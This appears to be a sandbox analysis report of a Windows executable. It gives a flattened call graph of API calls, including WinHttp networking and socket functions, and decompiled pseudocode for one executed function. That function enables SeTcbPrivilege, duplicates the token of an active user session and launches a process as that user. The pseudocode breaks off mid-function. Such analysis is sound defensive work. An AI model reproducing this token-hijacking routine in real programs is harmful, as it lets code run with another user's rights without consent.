_vsnwprintf 15653->15654 15656 39c7fe 15654->15656 15655 39c84f 15655->15631 15656->15655 15657 3a1d90 10 API calls 15656->15657 15658 39c811 15657->15658 15659 39c81a GetFullPathNameW 15658->15659 15660 39c842 15658->15660 15661 39c83c 15659->15661 15662 39c832 15659->15662 15660->15631 15663 39bb40 HeapFree 15661->15663 15662->15631 15663->15660 15665 39c7b0 13 API calls 15664->15665 15666 391bf7 15665->15666 15667 391c5d 15666->15667 15668 391bfd ??2@YAPAXI 15666->15668 15667->15640 15669 391c0e 15668->15669 15670 391c15 15668->15670 15671 39b110 CoCreateInstance 15669->15671 15672 393630 21 API calls 15670->15672 15671->15670 15673 391c25 15672->15673 15674 39bb40 HeapFree 15673->15674 15675 391c37 15674->15675 15675->15667 15676 397a20 19 API calls 15675->15676 15677 391c49 ??3@YAXPAX 15676->15677 15677->15640 15679 391b20 46 API calls 15678->15679 15680 39ee69 15679->15680 15681 39eff7 15680->15681 15683 3926a0 11 API calls 15680->15683 15682 39f007 15681->15682 15684 39bb40 HeapFree 15681->15684 15686 39f017 15682->15686 15688 39bb40 HeapFree 15682->15688 15685 39ee7a 15683->15685 15684->15682 15687 3a0ad0 11 API calls 15685->15687 15689 39f035 15686->15689 15692 397a20 19 API calls 15686->15692 15700 39ee89 15687->15700 15688->15686 15690 39f850 24 API calls 15689->15690 15691 39f040 15690->15691 15691->15645 15691->15646 15693 39f02a ??3@YAXPAX 15692->15693 15693->15689 15694 39bb40 HeapFree 15694->15681 15695 39bb40 HeapFree 15695->15700 15696 395a10 58 API calls 15696->15700 15697 39ef52 ??2@YAPAXI 15697->15700 15698 39b110 CoCreateInstance 15698->15700 15700->15695 15700->15696 15700->15697 15700->15698 15701 39efac 15700->15701 15703 397a20 19 API calls 15700->15703 15707 39efaa 15700->15707 15708 397fc0 15700->15708 15702 39c7b0 13 API calls 15701->15702 15704 39efc4 15702->15704 15705 39ef95 ??3@YAXPAX 15703->15705 15706 391a80 2 API calls 15704->15706 15704->15707 15705->15700 15706->15707 15707->15681 15707->15694 15709 3968a0 13 API calls 15708->15709 15710 397fe4 15709->15710 15711 39801c 15710->15711 15712 3a1870 13 API calls 15710->15712 15711->15700 15713 397fef 15712->15713 15713->15711 15714 397ffa SysFreeString 15713->15714 15715 398001 SysAllocString 15713->15715 15714->15715 15715->15700 15717 39af1b _wtoi 15716->15717 15718 39af16 15716->15718 15719 39af7f 15717->15719 15731 39af33 15717->15731 15718->15533 15721 39afc8 15719->15721 15722 39afda 15719->15722 15723 39afbf 15719->15723 15724 39afd1 15719->15724 15729 39af99 15719->15729 15720 39b080 15720->15533 15928 394310 15721->15928 15946 399b50 15722->15946 15923 397d40 15723->15923 15783 398880 memset memset 15724->15783 15729->15720 15730 39b034 15729->15730 15733 39afff 15729->15733 15735 39b071 15730->15735 15736 39b045 15730->15736 15731->15719 15900 396110 15731->15900 15732 39b015 15957 39dc80 15732->15957 15733->15732 15737 39bb40 HeapFree 15733->15737 15740 3916b0 2 API calls 15735->15740 15741 39b052 15736->15741 15742 39bb40 HeapFree 15736->15742 15737->15732 15739 39af6d _wtoi 15739->15719 15740->15720 15743 39dc80 memcpy 15741->15743 15742->15741 15745 39b061 15743->15745 15747 3916b0 2 API calls 15745->15747 15746 3916b0 2 API calls 15748 39b02c 15746->15748 15749 39b069 15747->15749 15748->15533 15749->15533 15750->15537 15751->15540 15753 395661 15752->15753 15754 3956f0 15753->15754 16740 3a1020 _wtoi 15753->16740 15754->15539 15756 395673 15757 3966c0 11 API calls 15756->15757 15759 39567f 15757->15759 15759->15754 16741 398830 15759->16741 16746 397840 15760->16746 15766 39be7e 15767 39bf24 15766->15767 15768 39bb40 HeapFree 15766->15768 15769 39bf34 15767->15769 15770 39bb40 HeapFree 15767->15770 15768->15767 15771 39bf41 15769->15771 15772 39bb40 HeapFree 15769->15772 15770->15769 15773 39bf4e 15771->15773 15775 39bb40 HeapFree 15771->15775 15772->15771 15773->15546 15775->15773 15776 3a1d90 10 API calls 15777 39bec8 15776->15777 15777->15766 15778 399090 2 API calls 15777->15778 15779 39bedf 15778->15779 15780 3a0c10 _vsnwprintf 15779->15780 15781 39bef2 15780->15781 15781->15766 15782 395a10 58 API calls 15781->15782 15782->15766 15784 398906 15783->15784 15828 3988f8 15783->15828 15785 397b80 10 API calls 15784->15785 15788 398917 15785->15788 15786 391c70 10 API calls 15885 398b4a 15786->15885 15787 398982 15790 397e20 11 API calls 15787->15790 15787->15828 15788->15787 15799 39ba40 11 API calls 15788->15799 15788->15828 15789 398e8d 15791 398e9d 15789->15791 15794 39bb40 HeapFree 15789->15794 15793 39899a 15790->15793 15795 398eaf 15791->15795 15797 3966c0 11 API calls 15791->15797 15792 39bb40 HeapFree 15792->15789 15793->15828 15961 39ca00 15793->15961 15794->15791 15801 3966c0 11 API calls 15795->15801 15803 398ecd 15795->15803 15797->15795 15798 3989b4 15800 399090 2 API calls 15798->15800 15799->15787 15816 3989c4 15800->15816 15801->15803 15802 398ef4 15804 398f04 15802->15804 15806 39bb40 HeapFree 15802->15806 15803->15802 15805 39bb40 HeapFree 15803->15805 15807 398f14 15804->15807 15808 39bb40 HeapFree 15804->15808 15805->15803 15806->15804 15809 398f24 15807->15809 15811 39bb40 HeapFree 15807->15811 15808->15807 15810 398f34 15809->15810 15812 39bb40 HeapFree 15809->15812 15810->15729 15811->15809 15812->15810 15813 397e20 11 API calls 15815 398ac7 15813->15815 15814 399090 2 API calls 15820 398a56 15814->15820 15817 39a270 12 API calls 15815->15817 15815->15828 15826 398a42 15816->15826 15994 391680 15816->15994 15819 398ae5 15817->15819 15824 399090 2 API calls 15819->15824 15819->15828 15820->15828 15967 398f40 15820->15967 15827 398afe 15824->15827 15825 398a9d 15825->15813 15825->15828 15826->15814 15826->15825 15829 398c78 15827->15829 15830 398b21 15827->15830 15828->15786 15828->15885 15831 399090 2 API calls 15829->15831 15833 398b4f 15830->15833 15834 398b2e 15830->15834 15832 398c86 15831->15832 15837 398ca7 15832->15837 15861 398d1a 15832->15861 15840 398b58 15833->15840 15841 398b8e 15833->15841 15835 397070 42 API calls 15834->15835 15836 398b3a 15835->15836 15838 398bbd 15836->15838 15839 398b3e 15836->15839 15849 398cce 15837->15849 15850 398cb0 15837->15850 15842 391cc0 80 API calls 15838->15842 15843 3966c0 11 API calls 15839->15843 15840->15828 16005 3967e0 15840->16005 15844 398bf0 15841->15844 15845 398b93 15841->15845 15842->15828 15843->15885 15847 3a1d90 10 API calls 15844->15847 15848 3967e0 14 API calls 15845->15848 15871 398bfb 15847->15871 15852 398b9a 15848->15852 15858 398cd9 15849->15858 15859 398cfe 15849->15859 15853 391c70 10 API calls 15850->15853 15855 397070 42 API calls 15852->15855 15856 398cb7 15853->15856 15854 397070 42 API calls 15857 398b79 15854->15857 15863 398ba8 15855->15863 15864 393040 21 API calls 15856->15864 15857->15838 15865 398b7d 15857->15865 15866 391c70 10 API calls 15858->15866 15869 391680 14 API calls 15859->15869 15860 398d87 15860->15828 15867 3a0500 14 API calls 15860->15867 15861->15860 15862 398d40 15861->15862 15868 3967e0 14 API calls 15861->15868 15870 397070 42 API calls 15862->15870 15863->15838 15872 398bac 15863->15872 15864->15885 15873 3966c0 11 API calls 15865->15873 15874 398ce0 15866->15874 15875 398dc0 15867->15875 15868->15862 15876 398d09 15869->15876 15877 398d4e 15870->15877 15879 399090 2 API calls 15871->15879 15871->15885 15878 3966c0 11 API calls 15872->15878 15873->15885 15880 3967e0 14 API calls 15874->15880 15875->15828 15881 398dc8 15875->15881 15882 393040 21 API calls 15876->15882 15883 398d63 15877->15883 15884 398d52 15877->15884 15878->15885 15879->15885 15887 398ced 15880->15887 15888 398dd5 15881->15888 15891 39bb40 HeapFree 15881->15891 15882->15885 15886 391cc0 80 API calls 15883->15886 15889 3966c0 11 API calls 15884->15889 15885->15789 15885->15792 15886->15860 15890 393040 21 API calls 15887->15890 15892 3a1d90 10 API calls 15888->15892 15889->15885 15890->15885 15891->15888 15893 398de5 15892->15893 15894 398e09 memcpy 15893->15894 15895 398def 15893->15895 15897 397af0 14 API calls 15894->15897 15896 391c70 10 API calls 15895->15896 15898 398df6 15896->15898 15897->15885 15899 397af0 14 API calls 15898->15899 15899->15885 15901 39ea90 13 API calls 15900->15901 15905 39611e 15901->15905 15902 3961c6 15902->15739 15903 396138 15904 3916b0 2 API calls 15903->15904 15907 396144 15904->15907 15905->15902 15905->15903 15906 3966c0 11 API calls 15905->15906 15906->15903 15908 3a1d90 10 API calls 15907->15908 15909 39614d 15908->15909 15910 3961ce 15909->15910 15911 396157 _itow 15909->15911 15910->15739 15911->15910 15912 39616b 15911->15912 15913 3966c0 11 API calls 15912->15913 15914 396174 15913->15914 15915 3966c0 11 API calls 15914->15915 15916 396180 15915->15916 16042 3a1d20 rand 15916->16042 15919 3966c0 11 API calls 15920 39619e 15919->15920 15921 3966c0 11 API calls 15920->15921 15922 3961aa 15921->15922 15922->15739 16047 39cf50 15923->16047 15925 397df8 15925->15729 15926 397d66 15926->15925 15927 39bb40 HeapFree 15926->15927 15927->15925 15929 396d30 GetTokenInformation 15928->15929 15930 394339 15929->15930 15931 39434a 15930->15931 15932 39433d 15930->15932 16727 39f990 15931->16727 15933 397d40 200 API calls 15932->15933 15935 394344 15933->15935 15935->15729 15936 394354 SHGetFolderPathW 15937 39437b 15936->15937 15938 39437f 15936->15938 15940 39cf50 200 API calls 15937->15940 15939 399090 2 API calls 15938->15939 15939->15937 15941 3943bc 15940->15941 15942 39c320 22 API calls 15941->15942 15944 3943da 15941->15944 15942->15944 15943 394442 15943->15729 15944->15943 15945 39bb40 HeapFree 15944->15945 15945->15943 15947 39cf50 200 API calls 15946->15947 15948 399b7a 15947->15948 15949 399d29 15948->15949 15950 399c68 15948->15950 15953 398030 10 API calls 15948->15953 15951 399d3a 15949->15951 15954 39bb40 HeapFree 15949->15954 15950->15949 15952 39bb40 HeapFree 15950->15952 15951->15729 15952->15949 15955 399b97 15953->15955 15954->15951 15955->15950 15956 399090 2 API calls 15955->15956 15956->15950 15958 39dc90 15957->15958 15959 39b024 15957->15959 15958->15959 15960 39dc9e memcpy 15958->15960 15959->15746 15960->15959 16009 39d7e0 15961->16009 15963 39ca88 15963->15798 15964 39ca17 15964->15963 15965 39bb40 HeapFree 15964->15965 15966 39ca79 15965->15966 15966->15798 15968 39ca00 12 API calls 15967->15968 15969 398f57 15968->15969 15970 39900c 15969->15970 15971 39d7e0 12 API calls 15969->15971 15970->15825 15972 398f67 15971->15972 15972->15970 15973 398f8a 15972->15973 16021 39f5d0 15972->16021 15975 39ee40 97 API calls 15973->15975 15993 398fbb 15973->15993 15977 398f9c 15975->15977 15976 398f7e 15976->15973 15980 391be0 34 API calls 15976->15980 15978 398ff7 15977->15978 15982 39f5d0 14 API calls 15977->15982 15977->15993 15981 39bb40 HeapFree 15978->15981 15979 39d6e0 10 API calls 15983 398fcc 15979->15983 15980->15973 15984 398ffd 15981->15984 15987 398faf 15982->15987 15985 398fd0 15983->15985 15986 398fe7 15983->15986 15984->15825 15988 39bb40 HeapFree 15985->15988 15989 397a20 19 API calls 15986->15989 15987->15978 15990 391be0 34 API calls 15987->15990 15991 398fd9 15988->15991 15992 398fee ??3@YAXPAX 15989->15992 15990->15993 15991->15825 15992->15978 15993->15978 15993->15979 15995 3916ab 15994->15995 15996 39168c 15994->15996 16000 393040 15995->16000 15997 3a0780 14 API calls 15996->15997 15998 3916a1 15997->15998 15999 397920 14 API calls 15998->15999 15999->15995 16001 39ca00 12 API calls 16000->16001 16002 393052 16001->16002 16003 39305e 16002->16003 16032 392ab0 16002->16032 16003->15826 16006 3967e9 16005->16006 16007 391680 14 API calls 16006->16007 16008 3967f8 16006->16008 16007->16008 16008->15854 16010 39d7f7 16009->16010 16014 39d873 16009->16014 16011 39d80c 16010->16011 16012 3a1d90 10 API calls 16010->16012 16011->15964 16013 39d830 16012->16013 16013->16014 16015 399090 2 API calls 16013->16015 16014->15964 16016 39d847 16015->16016 16017 3a0c10 _vsnwprintf 16016->16017 16018 39d85b 16017->16018 16019 39d862 16018->16019 16020 39bb40 HeapFree 16018->16020 16019->15964 16020->16014 16022 39c7b0 13 API calls 16021->16022 16023 39f5e0 16022->16023 16024 39f5e6 GetFileAttributesW 16023->16024 16029 39f61c 16023->16029 16025 39f5fa 16024->16025 16026 39f614 16024->16026 16025->16026 16028 39f5fe 16025->16028 16027 39bb40 HeapFree 16026->16027 16027->16029 16030 39bb40 HeapFree 16028->16030 16029->15976 16031 39f609 16030->16031 16031->15976 16033 392ad0 16032->16033 16034 397a20 19 API calls 16033->16034 16036 392b04 16033->16036 16041 392b37 16033->16041 16035 392afb ??3@YAXPAX 16034->16035 16035->16036 16036->16036 16037 392b48 16036->16037 16038 392b26 16036->16038 16040 39bb40 HeapFree 16037->16040 16039 3a1d90 10 API calls 16038->16039 16039->16041 16040->16041 16041->16003 16043 3a1d90 10 API calls 16042->16043 16044 3a1d44 16043->16044 16045 396191 16044->16045 16046 3a1d51 rand 16044->16046 16045->15910 16045->15919 16046->16045 16046->16046 16048 39cf7d 16047->16048 16049 39cf8d 16047->16049 16048->15926 16049->16048 16050 3a1d90 10 API calls 16049->16050 16051 39cfbe 16050->16051 16056 39ba40 11 API calls 16051->16056 16073 39cffd 16051->16073 16052 39d2a1 16054 39d2b1 16052->16054 16057 39bb40 HeapFree 16052->16057 16053 39bb40 HeapFree 16053->16052 16055 39d2c1 16054->16055 16058 39bb40 HeapFree 16054->16058 16059 39d2d1 16055->16059 16060 39bb40 HeapFree 16055->16060 16061 39cff9 16056->16061 16057->16054 16058->16055 16059->15926 16060->16059 16062 39daf0 11 API calls 16061->16062 16061->16073 16063 39d082 16062->16063 16064 3a1d90 10 API calls 16063->16064 16063->16073 16065 39d0a5 16064->16065 16066 399090 2 API calls 16065->16066 16067 39d12c 16065->16067 16065->16073 16066->16067 16074 3971d0 memset WinHttpCrackUrl 16067->16074 16070 393c70 15 API calls 16071 39d1c4 16070->16071 16072 39f720 11 API calls 16071->16072 16071->16073 16072->16073 16073->16052 16073->16053 16075 397231 16074->16075 16076 397512 16074->16076 16075->16076 16078 3a1d90 10 API calls 16075->16078 16077 397525 16076->16077 16079 39bb40 HeapFree 16076->16079 16077->16070 16077->16073 16080 39724c 16078->16080 16079->16077 16080->16076 16081 3a1d90 10 API calls 16080->16081 16085 397268 16081->16085 16082 39745c 16083 39bb40 HeapFree 16082->16083 16084 397502 16083->16084 16084->16076 16086 39bb40 HeapFree 16084->16086 16085->16082 16087 3b1280 2 API calls 16085->16087 16086->16076 16088 3972a3 16087->16088 16089 39743a 16088->16089 16090 3972ae 16088->16090 16129 3b1b60 16089->16129 16091 399090 2 API calls 16090->16091 16092 3972bc WinHttpOpen 16091->16092 16092->16082 16093 3972dd WinHttpSetTimeouts WinHttpConnect 16092->16093 16096 3974eb 16093->16096 16097 397317 16093->16097 16095 397450 16098 397454 16095->16098 16149 3b1b30 16095->16149 16096->16082 16100 3974f2 WinHttpCloseHandle 16096->16100 16099 399090 2 API calls 16097->16099 16139 3b1730 16098->16139 16102 397325 16099->16102 16100->16082 16107 39735d WinHttpOpenRequest 16102->16107 16108 3974dd 16102->16108 16105 397478 16109 3b1730 29 API calls 16105->16109 16106 39747f 16152 3b1c30 16106->16152 16107->16108 16110 39736e WinHttpSendRequest 16107->16110 16108->16096 16112 3974e4 WinHttpCloseHandle 16108->16112 16109->16082 16113 397383 WinHttpReceiveResponse 16110->16113 16114 3974c4 16110->16114 16112->16096 16113->16114 16117 397393 WinHttpQueryHeaders 16113->16117 16114->16108 16116 3974d6 WinHttpCloseHandle 16114->16116 16115 39748f 16118 39749d 16115->16118 16119 397493 16115->16119 16116->16108 16117->16114 16127 3973b8 16117->16127 16118->16098 16120 3974ae 16118->16120 16121 3b1730 29 API calls 16119->16121 16122 3b1730 29 API calls 16120->16122 16121->16082 16124 397438 16122->16124 16123 3973d0 WinHttpQueryDataAvailable 16123->16114 16123->16127 16125 391a80 2 API calls 16124->16125 16125->16114 16126 3a1d90 10 API calls 16126->16127 16127->16114 16127->16123 16127->16124 16127->16126 16128 39741b WinHttpReadData 16127->16128 16128->16114 16128->16127 16131 3b1b71 16129->16131 16130 3b1b75 16130->16095 16131->16130 16132 397e20 11 API calls 16131->16132 16134 3b1bba 16132->16134 16136 3b1c0d 16134->16136 16138 3b1bc1 16134->16138 16158 3a5c47 16134->16158 16213 3a61ad 16134->16213 16137 39bb40 HeapFree 16136->16137 16136->16138 16137->16138 16138->16095 16140 3b174f 16139->16140 16141 3b1740 16139->16141 16678 3b1700 16140->16678 16667 3a63c6 16141->16667 16147 39bb40 HeapFree 16148 3b1766 16147->16148 16148->16082 16682 3b1820 16149->16682 16151 397471 16151->16105 16151->16106 16153 3b1c7d 16152->16153 16154 3b1c3d 16152->16154 16153->16115 16155 3a1d90 10 API calls 16154->16155 16156 3b1c4c 16155->16156 16156->16153 16157 3b1c58 memcpy 16156->16157 16157->16115 16159 3a5c62 memset 16158->16159 16160 3a5c7e 16159->16160 16235 3a50d5 16160->16235 16162 3a5ce9 16212 3a5de6 16162->16212 16242 3a39c0 16162->16242 16164 3a5d05 16164->16212 16246 3a4054 16164->16246 16212->16134 16214 3a61d6 memset htons sprintf 16213->16214 16216 3a6223 16214->16216 16216->16216 16217 3a622a htons 16216->16217 16218 3a623e 16217->16218 16218->16218 16219 3a6245 memcpy 16218->16219 16220 3a6268 16219->16220 16221 3a3bb7 7 API calls 16220->16221 16222 3a62b0 16221->16222 16223 3a62bb memset 16222->16223 16229 3a638c 16222->16229 16224 3a3bb7 7 API calls 16223->16224 16225 3a62f0 16224->16225 16226 3a62fb htons 16225->16226 16225->16229 16227 3afd0b 22 API calls 16226->16227 16228 3a631a 16227->16228 16228->16229 16230 3afb73 20 API calls 16228->16230 16229->16134 16231 3a632f 16230->16231 16231->16229 16236 3a50f3 16235->16236 16236->16236 16237 3a5101 16236->16237 16238 3a39c0 memset 16236->16238 16237->16162 16239 3a5115 16238->16239 16239->16237 16240 3a3b23 2 API calls 16239->16240 16241 3a5121 htonl 16240->16241 16241->16237 16243 3a39cb 16242->16243 16243->16243 16244 3a39e8 memset 16243->16244 16245 3a39fe 16244->16245 16245->16164 16247 3a406a 16246->16247 16447 3afd0b 16247->16447 16448 3afd29 16447->16448 16450 3afd37 htons memcpy 16447->16450 16449 3afd0b 15 API calls 16448->16449 16448->16450 16449->16450 16471 3aec77 memset memset memcpy memcpy 16450->16471 16668 3a63dc 16667->16668 16669 3afb73 20 API calls 16668->16669 16670 3a63f4 16669->16670 16671 3a3bb7 7 API calls 16670->16671 16673 3a6455 16670->16673 16672 3a642f 16671->16672 16672->16673 16674 3a3bb7 7 API calls 16672->16674 16675 3a6192 16673->16675 16674->16673 16676 3aff10 closesocket 16675->16676 16677 3a61a1 16676->16677 16677->16140 16679 3b170a 16678->16679 16680 3b1710 16678->16680 16681 39bb40 HeapFree 16679->16681 16680->16147 16680->16148 16681->16680 16686 3b1839 16682->16686 16683 3b1b23 16683->16151 16684 3a1d90 10 API calls 16685 3b18ac 16684->16685 16687 3a1d90 10 API calls 16685->16687 16686->16683 16686->16684 16688 3b18bd 16687->16688 16689 396cb0 2 API calls 16688->16689 16691 3b1b07 16688->16691 16713 3b1ade 16688->16713 16692 3b18e3 16689->16692 16690 39bb40 HeapFree 16690->16691 16693 39bb40 HeapFree 16691->16693 16695 3b1b15 16691->16695 16694 396cb0 2 API calls 16692->16694 16693->16695 16696 3b18f1 16694->16696 16695->16151 16697 396cb0 2 API calls 16696->16697 16698 3b18ff 16697->16698 16699 399090 2 API calls 16698->16699 16700 3b190d 16699->16700 16701 396cb0 2 API calls 16700->16701 16703 3b191b wsprintfA 16701->16703 16713->16690 16713->16691 16728 39f9bd 16727->16728 16732 39fa87 16727->16732 16729 396cb0 2 API calls 16728->16729 16730 39f9ce 16729->16730 16731 396cb0 2 API calls 16730->16731 16730->16732 16733 39f9fe GetProcAddress 16731->16733 16732->15936 16734 396cb0 2 API calls 16733->16734 16735 39fa27 GetProcAddress 16734->16735 16736 396cb0 2 API calls 16735->16736 16737 39fa4a GetProcAddress 16736->16737 16738 396cb0 2 API calls 16737->16738 16739 39fa6d GetProcAddress 16738->16739 16739->16732 16740->15756 16742 39883d 16741->16742 16743 398857 memcpy 16741->16743 16744 3a1d90 10 API calls 16742->16744 16743->15754 16745 398851 16744->16745 16745->16743 16747 3966c0 11 API calls 16746->16747 16748 39784c 16747->16748 16749 391a00 16748->16749 16750 3966c0 11 API calls 16749->16750 16751 391a09 16750->16751 16752 3a0a00 16751->16752 16753 3966c0 11 API calls 16752->16753 16754 39be5e 16753->16754 16754->15766 16754->15767 16754->15776 16755 393dd0 ??2@YAPAXI 16756 393de5 memset 16755->16756 16758 393dfd 16755->16758 16756->16758 16759 393e20 16758->16759 16760 39f250 16758->16760 16761 399090 2 API calls 16760->16761 16762 39f26e LoadLibraryW 16761->16762 16763 39f2be 16762->16763 16764 39f292 16762->16764 16763->16758 16765 396cb0 2 API calls 16764->16765 16766 39f29f GetProcAddress 16765->16766 16766->16763 16766->16764

    Executed Functions

    Function 0039C320, Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 381libraryprocess

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 39c320-39c37a 2 39c44f-39c472 0->2 3 39c380-39c3aa call 396cb0 0->3 9 39c4bf-39c4c9 2->9 10 39c474-39c48e LookupPrivilegeValueW 2->10 11 39c3b0-39c444 call 396cb0 GetProcAddress call 396cb0 GetProcAddress call 396cb0 GetProcAddress call 396cb0 GetProcAddress 3->11 12 39c446-39c44e 3->12 15 39c4cb-39c4d6 9->15 16 39c515-39c51c 9->16 10->9 13 39c490-39c4bd AdjustTokenPrivileges 10->13 11->2 11->12 13->9 20 39c4d9-39c4db 15->20 17 39c711 16->17 18 39c522-39c529 16->18 21 39c714-39c719 17->21 18->17 33 39c52f-39c54a 18->33 20->16 24 39c4dd-39c4e7 20->24 25 39c71b-39c72a 21->25 26 39c72d-39c732 21->26 31 39c4e9-39c4ec 24->31 32 39c504-39c50b 24->32 25->26 29 39c743-39c748 26->29 30 39c734-39c73b 26->30 36 39c759-39c75b 29->36 37 39c74a-39c756 29->37 30->29 35 39c4f0-39c4f2 31->35 38 39c50d 32->38 39 39c510-39c513 32->39 33->17 53 39c550-39c571 33->53 42 39c4fe-39c501 35->42 43 39c4f4-39c4fa 35->43 44 39c75d-39c763 call 39bb40 36->44 45 39c766-39c76b 36->45 37->36 38->39 39->16 39->33 42->32 43->35 47 39c4fc 43->47 44->45 49 39c76d-39c794 AdjustTokenPrivileges 45->49 50 39c797-39c7a0 45->50 47->32 49->50 53->17 55 39c577-39c5a9 GetTokenInformation 53->55 57 39c5ab-39c5b4 GetLastError 55->57 58 39c5d1-39c5f0 GetTokenInformation 55->58 57->21 59 39c5ba-39c5cb call 3a1d90 57->59 58->21 60 39c5f6-39c635 58->60 59->21 59->58 60->21 64 39c63b-39c67d 60->64 64->21 66 39c683-39c6c4 call 399090 64->66 66->21 70 39c6c6-39c6f6 CreateProcessAsUserW 66->70 70->21 71 39c6f8-39c70f 70->71 71->21
    C-Code - Quality: 69%
    			E0039C320(void** _a4, intOrPtr* _a8, WCHAR* _a12, long _a16) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				int _v36;
				int _v40;
				long _v44;
				void* _v48;
				struct _PROCESS_INFORMATION _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				char* _v88;
				void* _v92;
				char _v96;
				intOrPtr _v100;
				struct _TOKEN_PRIVILEGES _v112;
				struct _TOKEN_PRIVILEGES _v128;
				char _v228;
				struct _STARTUPINFOW _v296;
				char _v496;
				char _v1008;
				void* _v1520;
				intOrPtr _t122;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				intOrPtr _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				intOrPtr _t149;
				void* _t152;
				void* _t154;
				intOrPtr _t157;
				void* _t158;
				void* _t162;
				intOrPtr _t165;
				void* _t166;
				void* _t170;
				long _t172;
				void* _t175;
				signed int _t176;
				void* _t177;
				void* _t181;
				_Unknown_base(*)()* _t199;
				intOrPtr _t201;
				intOrPtr _t205;
				intOrPtr _t207;
				char* _t214;
				void** _t226;
				intOrPtr _t237;
				intOrPtr _t239;
				intOrPtr _t251;
				void* _t259;
				intOrPtr _t263;
				intOrPtr _t267;
				signed int _t269;
				signed int _t270;
				void* _t271;
				struct HINSTANCE__* _t272;
				void* _t273;
				void* _t275;
				_Unknown_base(*)()* _t279;

				_t201 =  *0x3b8628; // 0x593938
				_v8 = 0;
				_v20 = 0;
				_v24 = 0xffffffff;
				_v28 = 0;
				_v36 = 0;
				_v16 = 0;
				_v296.cb = 0x44;
				_v40 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xb8))))( &_v296);
				_v64.hProcess = 0;
				_v64.hThread = 0;
				_v64.dwProcessId = 0;
				_v64.dwThreadId = 0;
				_t279 =  *0x3b85c8; // 0x73bd1f81
				if(_t279 != 0) {
					L4:
					_t122 =  *0x3b8628; // 0x593938
					_v44 = 0;
					_t29 = _t122 + 0x150; // 0x593a88
					_t269 = _t29;
					_t125 =  *((intOrPtr*)( *_t269))( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x100))))(0x28,  &_v16));
					__eflags = _t125;
					if(_t125 != 0) {
						_t181 = LookupPrivilegeValueW(0, L"SeTcbPrivilege",  &(_v112.Privileges)); // executed
						__eflags = _t181;
						if(_t181 != 0) {
							_v112.PrivilegeCount = 1;
							_v100 = 2;
							AdjustTokenPrivileges(_v16, 0,  &_v112, 0x10,  &_v128,  &_v44);
						}
					}
					_t126 =  *0x3b85dc; // 0x73bd4023
					_t270 = _t269 | 0xffffffff;
					__eflags = _t126;
					if(_t126 == 0) {
						L18:
						_t127 =  *0x3b85fc; // 0x0
						__eflags = _t127;
						if(_t127 == 0) {
							goto L31;
						} else {
							_t270 =  *_t127();
							__eflags = _t270 - 0xffffffff;
							if(_t270 == 0xffffffff) {
								goto L31;
							} else {
								goto L20;
							}
						}
					} else {
						_t175 =  *_t126(0, 0, 1,  &_v28,  &_v36); // executed
						__eflags = _t175;
						if(_t175 == 0) {
							goto L18;
						} else {
							_t259 = _v36;
							_t267 = _v28;
							_t176 = 0;
							__eflags = _t259;
							if(_t259 > 0) {
								_t226 = _t267 + 8;
								while(1) {
									__eflags =  *_t226;
									if( *_t226 == 0) {
										_t270 =  *(_t267 + (_t176 + _t176 * 2) * 4);
										goto L15;
									}
									_t176 = _t176 + 1;
									_t226 =  &(_t226[3]);
									__eflags = _t176 - _t259;
									if(_t176 < _t259) {
										continue;
									} else {
									}
									goto L15;
								}
							}
							L15:
							_t177 =  *0x3b85f8; // 0x73bd1b65
							__eflags = _t177;
							if(_t177 != 0) {
								 *_t177(_t267);
							}
							__eflags = _t270 - 0xffffffff;
							if(_t270 != 0xffffffff) {
								L20:
								_t207 =  *0x3b8628; // 0x593938
								 *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x190))))();
								_t146 =  *0x3b85c8(_t270,  &_v24); // executed
								__eflags = _t146;
								if(_t146 == 0) {
									L31:
									_t271 = _v48;
								} else {
									_t147 =  *0x3b8628; // 0x593938
									_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x144))))(_v24, 0x2000000, 0, 1, 1,  &_v8);
									__eflags = _t148;
									if(_t148 == 0) {
										goto L31;
									} else {
										_t149 =  *0x3b8628; // 0x593938
										 *((intOrPtr*)( *((intOrPtr*)(_t149 + 0xf8))))(_v24);
										_v12 = 0;
										_t271 = 0; // executed
										_t152 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
										__eflags = _t152;
										if(_t152 != 0) {
											L25:
											_t154 = GetTokenInformation(_v8, 1, _t271, _v12,  &_v12); // executed
											__eflags = _t154;
											if(_t154 != 0) {
												_t214 =  &_v32;
												_t157 =  *0x3b8628; // 0x593938
												_v32 = 0x100;
												_v1008 = 0;
												_v1520 = 0;
												_t158 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x140))))(0,  *_t271,  &_v1008, _t214,  &_v1520, _t214,  &_v48);
												__eflags = _t158;
												if(_t158 != 0) {
													_v96 = 0;
													_v88 = 0;
													_v92 = 0;
													_v84 = 0;
													_v80 = 0;
													_v76 = 0;
													_v72 = 0;
													_v68 = 0;
													_v88 =  &_v1008;
													_t251 =  *0x3b8628; // 0x593938
													_v96 = 0x20;
													_t85 = _t251 + 0x200; // 0x75501aac
													_t162 =  *((intOrPtr*)( *_t85))(_v8,  &_v96); // executed
													__eflags = _t162;
													if(__eflags != 0) {
														_v296.wShowWindow = 0;
														E00399090(__eflags,  &_v496, 0x9c);
														_t273 = _t273 + 8;
														_v296.lpDesktop =  &_v496;
														_t165 =  *0x3b8628; // 0x593938
														_t91 = _t165 + 0x1f8; // 0x75501a7a
														_t166 =  *((intOrPtr*)( *_t91))( &_v20, _v8, 0); // executed
														__eflags = _t166;
														if(_t166 != 0) {
															_t170 = CreateProcessAsUserW(_v8, 0, _a12, 0, 0, 0, _a16, _v20, 0,  &_v296,  &_v64); // executed
															__eflags = _t170;
															if(_t170 != 0) {
																 *_a4 = _v64.hProcess;
																 *_a8 = _v64.hThread;
																_v40 = 1;
															}
														}
													}
												}
											}
										} else {
											_t172 = GetLastError();
											__eflags = _t172 - 0x7a;
											if(_t172 == 0x7a) {
												_t271 = E003A1D90(_v12, 0);
												_t273 = _t273 + 8;
												__eflags = _t271;
